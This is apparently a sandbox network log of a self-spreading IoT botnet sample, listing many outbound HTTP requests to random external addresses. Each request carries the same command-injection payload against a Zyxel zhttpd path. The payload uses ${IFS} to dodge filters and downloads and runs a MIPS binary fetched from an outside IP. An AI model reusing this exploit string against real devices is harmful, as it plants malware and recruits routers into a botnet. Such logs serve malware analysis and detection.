                                                  Jan 19, 2024 18:24:06.263181925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6953192.168.2.135041238.237.245.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263237953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6954192.168.2.1343298109.216.242.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263264894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6955192.168.2.1335094134.235.118.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263308048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6956192.168.2.1335530155.115.23.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263330936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6957192.168.2.133527258.95.0.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263379097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6958192.168.2.136082274.218.71.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263426065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6959192.168.2.135095831.127.146.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263465881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6960192.168.2.134182432.69.7.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263501883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6961192.168.2.1357138174.67.73.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263541937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6962192.168.2.13484188.233.218.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263591051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6963192.168.2.1343176116.85.137.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263629913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6964192.168.2.1350898196.150.190.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263659000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6965192.168.2.134935885.235.126.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263705015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6966192.168.2.1333788221.217.67.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263736010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6967192.168.2.135780459.235.208.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263787985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6968192.168.2.1352704139.175.130.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263820887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6969192.168.2.1352902137.164.116.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263873100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6970192.168.2.1333360178.202.250.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263890982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6971192.168.2.133499092.142.119.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263920069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6972192.168.2.1337658165.118.77.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.263983965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6973192.168.2.135472873.137.54.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264028072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6974192.168.2.1338800116.194.27.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264065027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6975192.168.2.1338082213.137.63.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264111996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6976192.168.2.1352290125.24.46.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264137983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6977192.168.2.1334716190.219.38.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264164925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6978192.168.2.134728242.3.2.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264199018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6979192.168.2.134882820.183.48.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264265060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6980192.168.2.1339470203.16.126.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264292955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6981192.168.2.1334248150.22.12.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264342070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6982192.168.2.1341008142.208.110.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264365911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6983192.168.2.1337012213.123.0.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264398098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6984192.168.2.1352210108.22.16.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264470100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6985192.168.2.1348100162.78.50.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264494896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6986192.168.2.1342148112.61.83.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264544010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6987192.168.2.1358904167.209.157.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264574051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6988192.168.2.1333176184.127.158.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264626980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6989192.168.2.135402494.192.253.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264657021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6990192.168.2.1342302113.38.70.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264699936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6991192.168.2.1349278152.35.79.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264735937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6992192.168.2.134559865.52.246.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264785051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6993192.168.2.1349764193.185.21.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264816999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6994192.168.2.135095051.71.131.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264867067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6995192.168.2.1347874147.185.251.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264894009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6996192.168.2.134156291.124.228.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264919043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6997192.168.2.1353828192.98.205.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.264991045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6998192.168.2.13474249.157.102.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265012026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6999192.168.2.1354994161.34.56.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265062094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7000192.168.2.133825669.171.85.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265094995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7001192.168.2.13405045.191.147.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265130997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7002192.168.2.134906861.160.131.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265168905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7003192.168.2.1333270116.131.49.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265228987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7004192.168.2.1334668112.104.82.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265244961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7005192.168.2.134975247.104.74.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265275002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7006192.168.2.133526873.37.89.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265307903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7007192.168.2.134984882.82.11.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265357018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7008192.168.2.1355766171.127.34.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265403986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7009192.168.2.13540708.224.165.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265433073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7010192.168.2.1344472223.11.199.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265491009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7011192.168.2.1360498131.11.7.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265535116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7012192.168.2.1339318197.184.191.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265554905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7013192.168.2.135172467.9.112.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265611887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7014192.168.2.1358042155.150.65.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.265650988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7015192.168.2.1337180208.51.121.71443
                                                  TimestampBytes transferredDirectionData
